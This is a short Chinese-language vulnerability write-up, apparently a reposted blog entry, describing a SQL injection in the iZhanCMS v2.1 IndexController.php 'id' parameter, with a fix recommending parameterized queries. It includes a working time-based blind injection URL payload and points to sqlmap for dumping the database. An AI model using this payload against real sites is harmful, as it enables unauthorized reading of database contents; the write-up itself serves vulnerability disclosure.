【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入 漏洞分析

 

0x00 环境准备

iZhanCMS官网:http://www.izhancms.com

网站源码版本:爱站CMS(zend6.0) V2.1

程序源码下载:http://www.izhancms.com/category/Category/index/cid/1

默认后台:http://127.0.0.1/admin/admin/index

默认用户名:admin  密码自设

测试网站首页:

【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入  漏洞分析

0x01 代码分析

1、        漏洞文件位置: /application/index/controllers/IndexController.php

第89-102行:

【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入  漏洞分析

这段函数中将获取到的参数id,没有单引号保护,拼接到SQL语句中,然后带入数据库执行,导致程序在实现上存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

0x02 漏洞利用

根据漏洞位置,构造出时间盲注的Payload:

http://127.0.0.1/index/index/qrcodePreview?id=2/**/xor/**/if(substring(user(),1,1)='2',sleep(5),0)--

可直接使用SQLMAP获取数据库数据:

【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入  漏洞分析

0x03 修复建议

使用参数化查询可有效避免SQL注入

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入  漏洞分析

上一篇:day0321 生成器


下一篇:Entity Framework Linq 动态组合where条件